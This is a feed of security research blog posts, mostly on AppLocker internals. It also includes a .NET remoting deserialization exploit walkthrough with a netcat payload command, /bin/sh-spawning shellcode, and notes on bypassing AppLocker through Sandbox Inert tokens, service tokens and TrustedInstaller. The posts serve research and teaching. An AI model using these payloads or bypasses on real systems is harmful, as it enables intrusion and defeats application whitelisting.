Now run ExploitRemotingService, ensuring you pass both the --nulluri option and the --path to output the request to a file and use the raw command with the run_notepad.bin file:

ExploitRemotingService.exe --nulluri --path request.bin tcp://127.0.0.1:1234/RemotingServer raw run_notepad.bin

You'll now have a file which looks like the following:

Hex dump of request.bin.

Normally before the serialized data there should be the URI for the remoting service (as shown in the first screenshot of this blog post), which is not present in this file. We can now test this out, run the ExampleRemotingService with the following command line, binding to port 1234 and running with Full type filter mode:

ExampleRemotingService.exe -p 1234 -t full

Using your favorite testing tool, such as netcat, just dump the file to TCP port 1234:

nc 127.0.0.1 1234 < request.bin

If everything is correct, you'll find notepad starts. If it doesn't work ensure you've built ExampleRemotingService as a .NET 4 binary otherwise the serialization payload won't execute.

What if the service has been connected to before and so the last URI has been set? One trick would be to find a way of causing the server to crash *cough* but that's out of the scope of this blog post. If anyone fancies adding a new plugin to ysoserial to generate the raw payload rather than needing two tools, then be my guest.

I think it's worth stressing, once again, that you really should not be using .NET remoting on anything you care about. I'd be interested to find out if anyone manages to use this technique on a real engagement.

Abusing Signed Windows Drivers

12 November 2019 at 23:23
The Problem We all know the “Driver Signature Enforcement” feature in windows. This security feature won’t allow you to load unsigned drivers into the windows kernel. To bypass this protection, many attackers use vulnerable signed drivers like turla. They try to find vulnerabilities in these drivers and exploit them. What people don’t think about is the fact that it’s way simpler than finding an exploitable memory corruption bug in a software driver - sometimes the driver just exposes the functionality via DeviceIoControl and this can be used to perform malicious operations in kernel mode.

The Internals of AppLocker - Part 1 - Overview and Setup

By: tiraniddo
16 November 2019 at 17:16
This is part 1 in a short series on the internals of AppLocker (AL). Part 2 is here, part 3 here and part 4 here.

AppLocker (AL) is a feature added to Windows 7 Enterprise and above as a more comprehensive application white-listing solution over the older Software Restriction Policies (SRP). When configured it's capable of blocking the creation of processes using various different rules, such as the application path as well as optionally blocking DLLs, script code, MSI installers etc. Technology wise it's slowly being replaced by the more robust Windows Defender Application Control (WDAC) which was born out of User Mode Code Integrity (UMCI), however at the moment AL is still easier to configure in an enterprise environment. It's considered a "Defense in Depth" feature according to MSRC's security servicing criteria so unless you find a bug which gives you EoP or RCE it's not something Microsoft will fix with a security bulletin.

It's common to find documentation on configuring AL, even in bypassing it (see for example Oddvar Moe's case study series from his website) however the inner workings are usually harder to find. Some examples of documentation which go some way towards documenting AL internals that I could find are:
However even these articles don't really give the full details. Therefore, I thought I'd dig a little deeper into some of the inner workings of AL, specifically focusing on the relationship between user access tokens and the applied rules. I'm not going to talk about configuration (outside of a quick setup for demonstration purposes) and I'm not really going to talk about bypasses. However, I will also pass on some dumb tricks you can do with an AL configured system which might be "bypass-like". Also note that this is documenting the behavior on Windows 10 1909 Enterprise. The internals might and almost certainly are different on other versions of Windows.

Let's start with a basic overview of the various components and give a super quick setup guide for a basic AL enabled Windows 10 1909 Enterprise installation so that we can try things out in subsequent parts.

Component Overview

AL uses a combination of a kernel driver (APPID.SYS) and user mode service (APPIDSVC). The introduction of kernel code is what distinguishes it from the old SRP which was entirely enforced in user mode, and so wasn't too difficult to bypass. The kernel driver's primary role is to handle blocking process creation through a Process Notification Callback as well as provide some general services. The user mode service on the other hand is more of a helper to do things which are difficult or impractical in the kernel, such as comprehensive code signature verification. That said looking at the implementation I think the majority could be done entirely in kernel mode considering that's what the Code Integrity (CI) module already does.

For DLL, Script and MSI enforcement various user-mode components access the SAFER APIs to determine whether code should run. The SAFER APIs might then call into the kernel driver or into the service over RPC depending on what it needs to do. I've summarized the various links in the following diagram.

The various interactions between components in AppLocker.

Setting up a Test System

I started by installing Windows 10 1909 Enterprise from an MSDN ISO. If you don't have MSDN access you get a trial Dev Environment VM from Microsoft which runs Windows 10 Enterprise. At the time of writing it's only 1903, but that's probably good enough, you should even be able to update to 1909 if you so desire. Then follow the next steps:
  1. Startup the VM and login as an administrator, then run an admin PowerShell console.
  2. Download the Default AppLocker Policy file from GitHub and save it as policy.xml.
  3. Run the PowerShell command "Set-AppLockerPolicy -XmlPolicy policy.xml".
  4. Run the command "sc.exe config appidsvc start= auto".
  5. Reboot the VM. 
This will install a simple default policy then enables the Application Identity Service. The policy is as follows:
  • EXE Rules
    • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to run any executable from anywhere.
  • DLL Rules
    • Allow Everyone group access to load any DLL under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to load a DLL from anywhere.
  • APPX Rules (Packages Applications, think store applications)
    • Allow Everyone to load any signed, packaged application .
Of course these rules are terrible and no one should actually use them, I've just presented them for the purposes of this blog post series.

Where is the policy configuration stored? There's some data in the registry, but the core of the policy configuration is stored the directory %WINDIR%\SYSTEM32\APPLOCKER, separated by type. For example the executable configuration is in EXE.APPLOCKER, the other names should be self explanatory. When the files in this directory are modified a call is made to the driver to reload the policy configuration. If we take a look at one of these files in a hex editor you'll find they're nothing like the XML policy we put in (as shown below), we'll come back to what these files actually contain in part 3 of this blog series.

Hex dump of the Exe.Applocker file which shows only binary data, no XML.

Once you reboot the VM the service will be running and AL will now be enforced. If you login with the administrator again and copy an executable to their Desktop folder, a location not allowed by policy, and run the executable you'll find, it works... You might think this makes sense generally, the user is an administrator which should be allowed to execute everything from anywhere, however the default administrator is a UAC split token admin, so the default "user" wouldn't have the Administrators group and so shouldn't be allowed to run code from anywhere? We'll get back to why this works in part 3.

To check AL is working create a new user (say using the New-LocalUser PowerShell command) and do not assign them to the local administrators group. Login as the new user and try copying and running the executable on the desktop again. You should be greeted with a suitable error dialog.

AppLocker error showing executable has been blocked from running.

It should be noted that even if you just enable the APPID driver AL won't be enforced, the service needs to be running for everything to be correctly enabled. You might assume you can just disable the service as an administrator and turn off AL trivially? Well about that...

C:\> sc.exe config appidsvc start= demand
[SC] ChangeServiceConfig FAILED 5:

Access is denied.

Seems you can't reconfigure the service back to demand start (its initial start mode) once you've auto started it. The answer to why you're given access denied is simple:

C:\> sc.exe qprotection appidsvc
[SC] QueryServiceConfig2 SUCCESS
SERVICE appidsvc PROTECTION LEVEL: WINDOWS LIGHT.

On Windows 10 (I've not checked 8.1) the AppID service runs as PPL. This means the Service Control Manager (SCM) prevents "normal" administrators from tampering with the service, such as disabling it or stopping it. I really don't see why Microsoft did this, there's SO many different ways to compromise AppLocker's function as an administrator it's not funny, disabling the service should presumably be the least of your worries. Oh well, of course in this case if you really must disable the service at run time you can use the Task Scheduler trick I showed in September to run some commands as TrustedInstaller, which happens to be a backdoor into the SCM. Try running the following PowerShell script as an administrator:

That's all for now, in part 2 we'll dig into how the Executable enforcement works under the hood.


Monitoring linux system-calls the right way

18 November 2019 at 00:00
Thisten-year-old vulnerability found by Chris Evans should remind us once more how, on modern linux systems, is important to take care of how we do security monitoring of software and user behaviour on modern linux systems. Here’s the knot.This simple assembly code spwans /bin/sh via execve and then exit. BITS 64 global _start section .text _start: jmp short jump main: pop rbx ; stack needs x64 register [rbx]- ; string address offset fits into 32 bit though xor eax, eax mov ecx, eax mov edx, eax mov al, 0xb int 0x80 ; execve_syscall xor eax,eax inc eax int 0x80 ; exit_syscall jump: call main message db "/bin/sh" If we compile it as an x64 ELF binary we can start noticing a few shenanigans.

The Internals of AppLocker - Part 2 - Blocking Process Creation

By: tiraniddo
18 November 2019 at 06:06
This is part 2 in a short series on the internals of AppLocker (AL). Part 1 is here, part 3 here and part 4 here.

In the previous blog post I briefly discussed the architecture of AppLocker (AL) and how to setup a really basic test system based on Windows 10 1909 Enterprise. This time I'm going to start going into more depth about how AL blocks the creation of processes which are not permitted by policy. I'll reiterate in case you've forgotten that what I'm describing is the internals on Windows 10 1909, the details can and also certainly are different on other operating systems.

How Can You Block Process Creation?

When the APPID driver starts it registers a process notification callback with the PsSetCreateProcessNotifyRoutineEx API. A process notification callback can return an error code by assigning to the CreationStatus field of the PS_CREATE_NOTIFY_INFO structure to block process creation. If the kernel detects a callback setting an error code then the process is immediately terminated by calling PsTerminateProcess.

An interesting observation is that the process notification callback is NOT called when the process object is created. It's actually called when the first thread is inserted into the process. The callback is made in the context of the thread creating the new thread, which is usually the thread creating the process, but it doesn't have to be. If you look in the PspInsertThread function in the kernel you'll find code which looks like the following:

if (++Process->ActiveThreads == 1)
  CurrentFlags |= FLAG_FIRST_THREAD;
// ...
if (CurrentFlags & FLAG_FIRST_THREAD) {
  if (!Process->Flags3.Minimal || Process->PicoContext)
    PspCallProcessNotifyRoutines(Process);
}

This code first increments the active thread count for the process. If the current count is 1 then a flag is set for use later in the function. Further on the call is made to PspCallProcessNotifyRoutines to invoke the registered callbacks, which is where the APPID callback will be invoked.

The fact the callback seems to be called at process creation time is due to most processes being created using NtCreateUserProcess which does both the process and the initial thread creation as one operation. However you could call NtCreateProcessEx to create a new process and that will be successful, just, in theory, you could never insert a thread into it without triggering the notification. Whether there's a race condition here, where you could get ActiveThreadCount to never be 1 I wouldn't like to say, almost certainly there's a process lock which would prevent it.

The behavior of blocking process creation after the process has been created is the key difference between WDAC and AL. WDAC prevents the creation of any executable code which doesn't meet the defined policy, therefore if you try and create a process with an executable file which doesn't match the policy it'll fail very early in process creation. However AL will allow you to create a process, doing many of the initialization tasks, and only once a thread is inserted into the process will the rug be pulled away.

The use of the process notification callback does have one current weakness, it doesn't work on Windows Subsystem for Linux processes. And when I say it doesn't work the APPID callback never gets invoked, and as process creation is blocked by invoking the callback this means any WSL process will run unmolested.

It isn't anything to do with the the checks for Minimal/PicoContext in the code above (or seemingly due to image formats as Alex Ionescu mentioned in his talk on WSL although that might be why AL doesn;t even try), but it's due to the way the APPID driver has enabled its notification callback. Specifically APPID calls the PsSetCreateProcessNotifyRoutineEx method, however this will not generate callbacks for WSL processes. Instead APPID needs to use PsSetCreateProcessNotifyRoutineEx2 to get callbacks for WSL processes. While it's probably not worth MS implementing actual AL support for WSL processes I'm surprised they don't give an option to block outright rather than just allowing anything to run.

Why Does AppLocker Decide to Block a Process?

We now know how process creation is blocked, but we don't know why AL decides a process should be blocked. Of course we have our configured rules which much be enforced somehow. Each rule consists of three parts:
  1. Whether the rule allows the process to be created or whether it denies creation.
  2. The User or Group the rule applies to.
  3. The property that the rule checks for, this could be an executable path, the hash of the executable file or publisher certificate and version information. A simple path example is "%WINDIR%\*" which allows any executable to run as long as it's located under the Windows Directory.
Let's dig into the APPID process notification callback, AiProcessNotifyRoutine, to find out what is actually happening, the simplified code is below:

void AiProcessNotifyRoutine(PEPROCESS Process, 
                HANDLE ProcessId, 
PPS_CREATE_NOTIFY_INFO CreateInfo) {
  PUNICODE_STRING ImageFileName;
  if (CreateInfo->FileOpenNameAvailable)
    ImageFileName = CreateInfo->ImageFileName;
  else
    SeLocateProcessImageName(Process, 
                             &ImageFileName);

  CreateInfo->CreationStatus = AipCreateProcessNotifyRoutine(
             ProcessId, ImageFileName, 
             CreateInfo->FileObject, 
             Process, CreateInfo);
}

The first thing the callback does is extract the path to the executable image for the process being checked. The PS_CREATE_NOTIFY_INFO structure passed to the callback can contain the image file path if the FileOpenNameAvailable flag is set. However there are situations where this flag is not set (such as in WSL) in which case the code gets the path using SeLocateProcessImageName. We know that having the full image path is important as that's one of the main selection criteria in the AL rule sets.

The next call is to the inner function, AipCreateProcessNotifyRoutine. The returned status code from this function is assigned to CreationStatus so if this function fails then the process will be terminatedThere's a lot going on in this function, I'm going to simplify it as much as I can to get the basic gist of what's going on while glossing over some features such as AppX support and Smart Locker (though they might come back in a later blog post). For now it looks like the following:

NTSTATUS AipCreateProcessNotifyRoutine(
        HANDLE ProcessId, 
        PUNICODE_STRING ImageFileName, 
        PFILE_OBJECT ImageFileObject, 
        PVOID Process, 
        PPS_CREATE_NOTIFY_INFO CreateInfo) {

    POLICY* policy = SrpGetPolicy();
    if (!policy)
        return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
    
    HANDLE ProcessToken;
    HANDLE AccessCheckToken;
    
    AiGetTokens(ProcessId, &ProcessToken, &AccessCheckToken);

    if (AiIsTokenSandBoxed(ProcessToken))
        return STATUS_SUCCESS;

    BOOLEAN ServiceToken = SrpIsTokenService(ProcessToken);
    if (SrpServiceBypass(Policy, ServiceToken, 0, TRUE))
        return STATUS_SUCCESS;
    
    HANDLE FileHandle;
    AiOpenImageFile(ImageFileName,
                    ImageFileObject, 
                    &FileHandle);
    AiSetAttributesExe(Policy, FileHandle, 
                       ProcessToken, AccessCheckToken);
    
    NTSTATUS result = SrppAccessCheck(
                      AccessCheckToken,
                      Policy);
    
    if (!NT_SUCCESS(result)) {
        AiLogFileAndStatusEvent(...);
        if (Policy->AuditOnly)
            result = STATUS_SUCCESS;
    }
    
    return result;
}

A lot to unpack here, be we can start at the beginning. The first thing the code does is request the current global policy object. If there doesn't exist a configured policy then the status code STATUS_ACCESS_DISABLED_BY_POLICY_OTHER is returned. You'll see this status code come up a lot when the process is blocked. Normally even if AL isn't enabled there's still a policy object, it'll just be configured to not block anything. I could imagine if somehow there was no global policy then every process creation would fail, which would not be good.

Next we get into the core of the check, first with a call to the function AiGetTokens. This functions opens a handle to the target process' access token based on its PID (why it doesn't just use the Process object from the PS_CREATE_NOTIFY_INFO structure escapes me, but this is probably just legacy code). It also returns a second token handle, the access check token, we'll see how this is important later.

The code then checks two things based on the process token. First it checks if the token is AiIsTokenSandBoxed. Unfortunately this is badly named, at least in a modern context as it doesn't refer to whether the token is a restricted token such as used in web browser sandboxes. What this is actually checking is whether the token has the Sandbox Inert flag set. One way of setting this flag is by calling CreateRestrictedToken passing the SANDBOX_INERT flag. Since Windows 8, or Windows with KB2532445 installed the "caller must be running as LocalSystem or TrustedInstaller or the system ignores this flag" according to the documentation. The documentation isn't entirely correct on this point, if you go and look at the implementation in NtFilterToken you'll find you can also set the flag if you're have the SERVICE SID, which is basically all services regardless of type. The result of this check is if the process token has the Sandbox Inert flag set then a success code is returned and AL is bypassed for this new process.

The second check determines if the token is a service token, first calling SrpIsTokenService to get a true or false value, then calls SrpServiceBypass to determine if the current policy allows service tokens to bypass the policy as well. If SrpServiceBypass returns true then the callback also returns a success code bypassing AL. However it seems it is possible to configure AL to enforce process checks on service processes, however I can't for the life of me find the documentation for this setting. It's probably far too dangerous a setting to allow the average sysadmin to use.

What's considered a service context is very similar to setting the Sandbox Inert flag with CreateRestrictedToken. If you have one of the following groups in the process token it's considered a service:

NT AUTHORITY\SYSTEM
NT AUTHORITY\SERVICE
NT AUTHORITY\RESTRICTED
NT AUTHORITY\WRITE RESTRICTED

The last two groups are only used to allow for services running as restricted or write restricted. Without them access would not be granted in the service check and AL might end being enforced when it shouldn't.

With that out of the way, we now get on to the meat of the checking process. First the code opens a handle to the main executable's file object. Access to the file will be needed if the rules such as hash or publisher certificate are used. It'll open the file even if those rules are being used, just in case. Next a call is made to AiSetAttributesExe which takes the access token handles, the policy and the file handle. This must do something magical, but being the tease I am we'll leave this for now.  Finally in this section a call is made to SrppAccessCheck which as its name suggests is doing the access check again the policy for whether this process is allowed to be created. Note that only the access check token is passed, not the process token.

The use of an access check, verifying a Security Descriptor against an Access Token makes perfect sense when you think of how rules are structured. The allow and deny rules correspond well to allow or deny ACEs for specific group SIDs. How the rule specification such as path restrictions are enforced is less clear but we'll leave the details of this for next time.

The result of the access check is the status code returned from AipCreateProcessNotifyRoutine which ends up being set to the CreationStatus field in the notification structure which can terminate the process. We can assume that this result will either be a success or an error code such as STATUS_ACCESS_DISABLED_BY_POLICY_OTHER. 

One final step is necessary, logging an event if the access check failed. If the result of the access check is an error, but the policy is currently configured in Audit Only mode, i.e. not enforcing AL process creation then the log entry will be made but the status code is reset back to a success so that the kernel will not terminate the process.

Testing System Behavior

Before we go let's test the behavior that we can create a process which is against the configured policy, as long as there's no threads in it. This is probably not a useful behavior but it's always good to try and verify your assumptions about reverse engineered code.

To do the test we'll need to install my NtObjectManager PowerShell module. We'll use the module more going forward so might as well install it now. To do that follow this procedure on the VM we setup last time:
  1. In an administrator PowerShell console, run the command 'Install-Module NtObjectManager'. Running this command as an admin allows the module to be installed in Program Files which is one of the permitted locations for Everyone in part 1's sample rules.
  2. Set the system execution policy to unrestricted from the same PowerShell window using the command 'Set-ExecutionPolicy -ExecutionPolicy Unrestricted'. This allows unsigned scripts to run for all users.
  3. Log in as the non-admin user, otherwise nothing will be enforced.
  4. Start a PowerShell console and ensure you can load the NtObjectManager module by running 'Import-Module NtObjectManager'. You shouldn't see any errors.
From part 1 you should already have an executable in the Desktop folder which if you run it it'll be blocked by policy (if not copy something else to the desktop, say a copy of NOTEPAD.EXE).

Now run the following three commands in the PowerShell windows. You might need to adjust the executable path as appropriate for the file you copied (and don't forget the \?? prefix).

$path = "\??\C:\Users\$env:USERNAME\Desktop\notepad.exe"
$sect = New-NtSectionImage -Path $path
$p = [NtApiDotNet.NtProcess]::CreateProcessEx($sect)
Get-NtStatus $p.ExitStatus

After the call to Get-NtStatus it should print that the current exit code for the process is STATUS_PENDING. This is an indication that the process is alive, although at the moment we don't have any code running in it. Now create a new thread in the process using the following:

[NtApiDotNet.NtThread]::Create($p00"Suspended"4096)
Get-NtStatus $p.ExitStatus

After calling NtThread::Create you should receive an big red exception error and the call to Get-NtStatus should now show that the process returned error. To make it more clear I've reproduced the example in the following screenshot:

Screenshot of PowerShell showing the process creation and error when a thread is added.

That's all for this post. Of course there's still a few big mysteries to solve, why does AiGetTokens return two token handles, what is AiSetAttributesExe doing and how does SrppAccessCheck verify the policy through an access check? Find out next time.


The Internals of AppLocker - Part 3 - Access Tokens and Access Checking

By: tiraniddo
20 November 2019 at 06:30
This is part 3 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 4 here.

In the last part I outlined how process creation is blocked with AL. I crucially left out exactly how the rules are processed to determine if a particular user was allowed to create a process. As it makes more sense to do so, we're going to go in reverse order from how the process was described in the last post. Let's start with talking about the access check implemented by SrppAccessCheck.

Access Checking and Security Descriptors

For all intents the SrppAccessCheck function is just a wrapper around a specially exported kernel API SeSrpAccessCheck. While the API has a few unusual features for this discussion might as well assume it to be the normal SeAccessCheck API. 

A Windows access check takes 4 main parameters:
  • SECURITY_SUBJECT_CONTEXT which identifies the caller's access tokens.
  • A desired access mask.
  • A GENERIC_MAPPING structure which allows the access check to convert generic access to object specific access rights.
  • And most importantly, the Security Descriptor which describes the security of the resource being checked.
Let's look at some code.

NTSTATUS SrpAccessCheckCommon(HANDLE TokenHandle, BYTE* Policy) {
    
    SECURITY_SUBJECT_CONTEXT Subject = {};
    ObReferenceObjectByHandle(TokenHandle, &Subject.PrimaryToken);
    
    DWORD SecurityOffset = *((DWORD*)Policy+4)
    PSECURITY_DESCRIPTOR SD = Policy + SecurityOffset;
    
    NTSTATUS AccessStatus;
    if (!SeSrpAccessCheck(&Subject, FILE_EXECUTE
                          &FileGenericMapping, 
                          SD, &AccessStatus) &&
        AccessStatus == STATUS_ACCESS_DENIED) {
        return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
    }
    
    return AccessStatus;
}

The code isn't very complex, first it builds a SECURITY_SUBJECT_CONTEXT structure manually from the access token passed in as a handle. It uses a policy pointer passed in to find the security descriptor it wants to use for the check. Finally a call is made to SeSrpAccessCheck requesting file execute access. If the check fails with an access denied error it gets converted to the AL specific policy error, otherwise any other success or failure is returned.

The only thing we don't really know in this process is what the Policy value is and therefore what the security descriptor is. We could trace through the code to find how the Policy value is set , but sometimes it's just easier to breakpoint on the function of interest in a kernel debugger and dump the pointed at memory. Taking the debugging approach shows the following:

WinDBG window showing the hex output of the policy pointer which shows the on-disk policy.

Well, what do we have here? We've seen those first 4 characters before, it's the magic signature of the on-disk policy files from part 1. SeSrpAccessCheck is extracting a value from offset 16, which is used as an offset into the same buffer to get the security descriptor. Maybe the policy files already contain the security descriptor we seek? Writing some quick PowerShell I ran it on the Exe.AppLocker policy file to see the result:

PowerShell console showing the security output by the script from Exe.Applocker policy file.

Success, the security descriptor is already compiled into the policy file! The following script defines two functions, Get-AppLockerSecurityDescriptor and Format-AppLockerSecurityDescriptor. Both take a policy file as input and returns either a security descriptor object or formatted representation:

If we run Format-AppLockerSecurityDescriptor on the Exe.Applocker file we get the following output for the DACL (trimmed for brevity):

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

We can see we have two ACEs which are for the Everyone group and one for the Administrators group. This matches up with the default configuration we setup in part 1. The last two entries are just there to ensure this access check works correctly when run from an App Container.

The most interesting part is the Condition field. This is a rarely used (at least for consumer version of the OS) feature of the security access checking in the kernel which allows a conditional expression evaluated to determine if an ACE is enabled or not. In this case we're seeing the SDDL format (documentation) but under the hood it's actually a binary structure. If we assume that the '*' acts as a globbing character then again this matches our rules, which let's remember:
  • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
  • Allow Administrators group to run any executable from anywhere.
This is how AL's rules are enforced. When you configure a rule you specify a group, which is added as the SID in an ACE in the policy file's Security Descriptor. The ACE type is set to either Allow or Deny and then a condition is constructed which enforces the rule, whether it be a path, a file hash or a publisher.

In fact let's add policy entries for a hash and publisher and see what condition is set for them. Download a new policy file from this link and run the Set-AppLockerPolicy command in an admin PowerShell console. Then re-run Format-ApplockerSecurityDescriptor:

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: (Exists APPID://SHA256HASH) && (APPID://SHA256HASH Any_of {#5bf6ccc91dd715e18d6769af97dd3ad6a15d2b70326e834474d952753
118c670})

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Flags : None
 - Condition: (Exists APPID://FQBN) && (APPID://FQBN >= {"O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS
® OPERATING SYSTEM\*", 0})

We can now see the two new conditional ACEs, for a SHA256 hash and the publisher subject name. Basically rinse and repeat as more rules and conditions are added to the policy they'll be added to the security descriptor with the appropriate ACEs. Note that the ordering of the rules are very important, for example Deny ACEs will always go first. I assume the policy file generation code correctly handles the security descriptor generation, but you can now audit it to make sure.

While we now understand how the rules are enforced, where does the values for the condition, such as APPID://PATH come from? If you read the (poor) documentation about conditional ACEs you'll find these values are Security Attributes. The attributes can be either globally defined or assigned to an access token. Each attribute has a name, then a list of one or more values which can be strings, integers, binary blobs etc. This is what AL is using to store the data in the access check token.

Let's go back a step and see what's going on with AiSetAttributesExe to see how these security attributes are generated.

Setting Token Attributes

The AiSetAttributesExe function takes 4 parameters:
  • A handle to the executable file.
  • Pointer to the current policy.
  • Handle to the primary token of the new process.
  • Handle to the token used for the access check.
The code isn't doesn't look very complex, initially:

NTSTATUS AiSetAttributesExe(
            PVOID Policy, 
            HANDLE FileHandle, 
            HANDLE ProcessToken, 
            HANDLE AccessCheckToken) {
  
    PSECURITY_ATTRIBUTES SecAttr;
    AiGetFileAttributes(Policy, FileHandle, &SecAttr);
    NTSTATUS status = AiSetTokenAttributes(ProcessToken, SecAttr);
    if (NT_SUCCESS(status) && ProcessToken != AccessCheckToken)
        status = AiSetTokenAttributes(AccessCheckToken, SecAttr);
    return status;
}

All the code does it call AiGetFileAttributes, which fills in a SECURITY_ATTRIBUTES structure, and then calls AiSetTokenAttributes to set them on the ProcessToken and the AccessCheckToken (if different). AiSetTokenAttributes is pretty much a simple wrapper around the exported (and undocumented) kernel API SeSetSecurityAttributesToken which takes the generated list of security attributes and adds them to the access token for later use in the access check.

The first thing AiGetFileAttributes does is query the file handle for it's full path, however this is the native path and takes the form \Device\Volume\Path\To\File. A path of this form is pretty much useless if you wanted to generate a single policy to deploy across an enterprise, such as through Group Policy. Therefore the code converts it back to a Win32 style path such as c:\Path\To\File. Even then there's no guarantee that the OS drive is C:, and what about wanting to have executables on USB keys or other removable drives where the letter could change?

To give the widest coverage the driver also maintains a fixed list of "Macros" which look like Environment variable expansions. These are used to replace the OS drive components as well as define placeholders for removable media. We already saw them in use in the dump of the security descriptor with string components like "%WINDIR%". You can find a list of the macros here, but I'll reproduce them here:
  • %WINDIR% - Windows Folder.
  • %SYSTEM32% - Both System32 and SysWOW64 (on x64).
  • %PROGRAMFILES% - Both Program Files and Program Files (x86).
  • %OSDRIVE% - The OS install drive.
  • %REMOVABLE% - Removable drive, such a CD or DVD.
  • %HOT% - Hot-pluggable devices such as USB keys.
Note that SYSTEM32 and PROGRAMFILES will map to either 32 or 64 bit directories when running on a 64 bit system (and presumably also ARM directories on ARM builds of Windows?). If you want to pick a specific directory you'll have to configure the rules to not use the macros.

To hedge its bets AL puts every possible path configuration, native path, Win32 path and all possible macroed paths as string values in the APPID://PATH security attribute.

AiGetFileAttributes continues, gathering the publisher information for the file. On Windows 10 the signature and certificate checking is done in multiple ways, first checking the kernel Code Integrity module (CI), then doing some internal work and finally falling back to calling over RPC to the running APPIDSVC. The information, along with the version number of the binary is put into the APPID://FQBN attribute, which stands for Fully Qualified Binary Name.

The final step is generating the file hash, which is stored in a binary blob attribute. AL supports three hash algorithms with the following attribute names:
  • APPID://SHA256HASH - Authenticode SHA256.
  • APPID://SHA1HASH - Authenticode SHA1
  • APPID://SHA256FLATHASH - SHA256 over entire file.
As the attributes are applied to both tokens we should be able to see them on the primary token of a normal user process. By running the following PowerShell command we can see the added security attributes on the current process token.

PS> $(Get-NtToken).SecurityAttributes | ? Name -Match APPID

Name       : APPID://PATH
ValueType  : String
Flags      : NonInheritable, CaseSensitive
Values     : {
   %SYSTEM32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,
   %WINDIR%\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,  
    ...}

Name       : APPID://SHA256HASH
ValueType  : OctetString
Flags      : NonInheritable
Values     : {133 66 87 106 ... 85 24 67}

Name       : APPID://FQBN
ValueType  : Fqbn
Flags      : NonInheritable, CaseSensitive
Values     : {Version 10.0.18362.1 - O=MICROSOFT CORPORATION, ... }


Note that the APPID://PATH attribute is always added, however APPID://FQBN and APPID://*HASH are only generated and added if there are rules which rely on them.

The Mystery of the Twin Tokens

We've come to the final stage, we now know how the security attributes are generated and applied to the two access tokens. The question now is why is there two tokens, the process token and one just for access checking?

Everything happens inside AiGetTokens, which is shown in a simplified form below:


NTSTATUS AiGetTokens(HANDLE ProcessId,

PHANDLE ProcessToken,

PHANDLE AccessCheckToken)

{

  AiOpenTokenByProcessId(ProcessId, &TokenHandle);

  NTSTATUS status = STATUS_SUCCESS;
  *Token = TokenHandle;
  if (!AccessCheckToken)
    return STATUS_SUCCESS;

  BOOL IsRestricted;
  status = ZwQueryInformationToken(TokenHandle, TokenIsRestricted, &IsRestricted);
  DWORD ElevationType;
  status = ZwQueryInformationToken(TokenHandle, TokenElevationType,
&ElevationType);

  HANDLE NewToken = NULL;
  if (ElevationType != TokenElevationTypeFull)
      status = ZwQueryInformationToken(TokenHandle, TokenLinkedToken,
&NewToken);

  if (!IsRestricted
    || NT_SUCCESS(status)
    || (status = SeGetLogonSessionToken(TokenHandle, 0,
&NewToken), NT_SUCCESS(status))
    || status == STATUS_NO_TOKEN) {
    if (NewToken)
      *AccessCheckToken = NewToken;
    else
      *AccessCheckToken = TokenHandle;
  }

  return status;
}

Let's summarize what's going on. First, the easy one, the ProcessToken handle is just the process token opened from the process, based on its PID. If the AccessCheckToken is not specified then the function ends here. Otherwise the AccessCheckToken is set to one of three values
  1. If the token is a non-elevated (UAC) token then use the full elevated token.
  2. If the token is 'restricted' and not a UAC token then use the logon session token.
  3. Otherwise use the primary token of the new process.
We can now understand why a non-elevated UAC admin has Administrator rules applied to them. If you're running as the non-elevated user token then case 1 kicks in and sets the AccessCheckToken to the full administrator token. Now any rule checks which specify the Administrators group will pass.

Case 2 is also interesting, a "restricted" token in this case is one which has been passed through the CreateRestrictedToken API and has restricted SIDs attached. This is used by various sandboxes especially Chromium's (and by extension anyone who uses it such as Firefox). Case 2 ensures that if the process token is restricted and therefore might not pass the access check, say the Everyone group is disabled, then the access check is done instead against the logon session's token, which is the master token from which all others are derived in a logon session.

If nothing else matches then case 3 kicks in and just assigns the primary token to the AccessCheckToken. There are edges cases in these rules. For example you can use CreateRestrictedToken to create a new access token with disabled groups, but which doesn't have restricted SIDs. This results in case 2 not being applied and so the access check is done against the limited token which could very easily fail to validate causing the process to be terminated.

There's also a more subtle edge case here if you look back at the code. If you create a restricted token of a UAC admin token then process creation typically fails during the policy check. When the UAC token is a full admin token the second call to ZwQueryInformationToken will not be made which results in NewToken being NULL. However in the final check, IsRestricted is TRUE so the second condition is checked, as status is STATUS_SUCCESS (from the first call to ZwQueryInformationToken) this passes and we enter the if block without ever calling SeGetLogonSessionToken. As NewToken is still NULL AccessCheckToken is set to the primary process token which is the restricted token which will cause the subsequent access check to fail. This is actually a long standing bug in Chromium, it can't be run as UAC admin if AppLocker is enforced.

That's the end of how AL does process enforcement. Hopefully it's been helpful. Next time I'll dig into how DLL enforcement works.

Locking Resources to Specific Processes

